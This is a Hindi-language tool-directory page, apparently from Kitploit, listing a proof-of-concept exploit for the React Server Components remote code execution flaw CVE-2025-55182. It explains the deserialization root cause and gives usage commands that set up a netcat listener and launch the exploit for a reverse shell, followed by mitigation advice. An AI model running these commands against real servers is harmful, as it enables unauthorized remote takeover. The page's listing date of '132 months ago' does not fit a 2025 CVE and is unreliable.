Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-React2Shell-RCE — CVE-2025-55182 (React2Shell) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो React Server Components में निर्मित Flight प्रोटोकॉल पेलोड के माध्यम से एक बिना प्रमाणीकरण वाली रिमोट कोड निष्पादन भेद्यता है। | Kitploit
उपकरण/GitHubGitHub/herick-costa/cve-2025-55182-react2shell-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूल

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
GitHub
herick-costa/cve-2025-55182-react2shell-rce

CVE-2025-55182-React2Shell-RCE

CVE-2025-55182 (React2Shell) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो React Server Components में निर्मित Flight प्रोटोकॉल पेलोड के माध्यम से एक बिना प्रमाणीकरण वाली रिमोट कोड निष्पादन भेद्यता है।

रिपॉजिटरी देखें
132 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

CVE CVSS RCE Status

CVE-2025-55182 - React2Shell (React सर्वर कंपोनेंट्स में अनप्रमाणित RCE)

CVE-2025-55182, जिसे React2Shell के नाम से भी जाना जाता है, एक गंभीर अनप्रमाणित रिमोट कोड निष्पादन (RCE) भेद्यता है जो React सर्वर कंपोनेंट्स पैकेजों (संस्करण 19.0, 19.1.0, 19.1.1 और 19.2.0) को प्रभावित करती है।

यह भेद्यता हमलावरों को प्रमाणीकरण की आवश्यकता के बिना, एक क्राफ्ट किए गए HTTP अनुरोध के माध्यम से संवेदनशील सर्वरों पर मनमाना कोड निष्पादन प्राप्त करने की अनुमति दे सकती है।


अवलोकन

React सर्वर कंपोनेंट्स क्लाइंट और सर्वर के बीच आदान-प्रदान किए जाने वाले कंपोनेंट डेटा को सीरियलाइज़ और डीसीरियलाइज़ करने के लिए Flight प्रोटोकॉल का उपयोग करते हैं।

इस डीसीरियलाइज़ेशन प्रक्रिया के दौरान अनुचित सत्यापन, विशेष रूप से क्राफ्ट किए गए पेलोड को आंतरिक ऑब्जेक्ट संरचनाओं में हेरफेर करने और खतरनाक JavaScript निष्पादन प्रिमिटिव्स तक पहुँचने की अनुमति दे सकता है।


मूल कारण

यह भेद्यता React सर्वर कंपोनेंट्स (RSC) Flight प्रोटोकॉल पेलोड के डीसीरियलाइज़ेशन के दौरान अपर्याप्त सत्यापन से उत्पन्न होती है।

विशेष रूप से क्राफ्ट किए गए पेलोड निम्नलिखित कर सकते हैं:

  • आंतरिक ऑब्जेक्ट संरचनाओं में हेरफेर कर सकते हैं
  • JavaScript प्रोटोटाइप श्रृंखला को पार कर सकते हैं
  • खतरनाक JavaScript कंस्ट्रक्टर्स तक पहुँच सकते हैं
  • सर्वर पर मनमाना कोड निष्पादन प्राप्त कर सकते हैं

यह कैसे काम करता है

  1. एक्सप्लॉइट एक विशेष रूप से क्राफ्ट किया गया multipart/form-data अनुरोध भेजता है
  2. सर्वर अनुरोध को React Flight पेलोड के रूप में व्याख्या करता है
  3. दुर्भावनापूर्ण चंक को डीसीरियलाइज़ेशन के दौरान संसाधित किया जाता है
  4. पेलोड:
  • आंतरिक निष्पादन प्रवाह में हेरफेर करता है
  • खतरनाक JavaScript निष्पादन प्रिमिटिव्स तक पहुँचता है
  • मनमाना कोड निष्पादित करता है
  1. हमलावर को लक्षित सर्वर पर रिमोट कोड निष्पादन प्राप्त हो जाता है

🚀 उपयोग

अपनी मशीन पर लिसनर प्रारंभ करें:

root@kitploit:~
nc -lvnp 4444

एक्सप्लॉइट चलाएँ:

root@kitploit:~
python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100

आवश्यकताएँ

  • भेद्य React / Next.js संस्करण
  • सर्वर-साइड React सर्वर कंपोनेंट्स सक्षम हों
  • सुलभ RSC एंडपॉइंट

शमन

इस भेद्यता को शमित करने के लिए:

  • React को उपलब्ध नवीनतम पैच किए गए रिलीज़ में अपग्रेड करें
  • उपलब्ध फ्रेमवर्क पैच लागू करें
  • संदिग्ध RSC अनुरोधों की निगरानी करें और उन्हें ब्लॉक करें

संदर्भ

-OffSec – CVE-2025-55182 शोषण विश्लेषण

-Microsoft Security – React2Shell से बचाव

-React सुरक्षा सलाह (आधिकारिक प्रकटीकरण)


अस्वीकरण

यह प्रोजेक्ट पूर्णतः निम्नलिखित के लिए प्रदान किया गया है:

  • सुरक्षा अनुसंधान
  • शैक्षिक उद्देश्य
  • अधिकृत सुरक्षा मूल्यांकन और पेनेट्रेशन परीक्षण

लेखक इस सामग्री के दुरुपयोग या इससे होने वाली क्षति के लिए कोई ज़िम्मेदारी नहीं लेते हैं। सभी लागू कानूनों और विनियमों का अनुपालन करने के लिए उपयोगकर्ता स्वयं पूर्ण रूप से ज़िम्मेदार हैं।

टूल डाउनलोड करें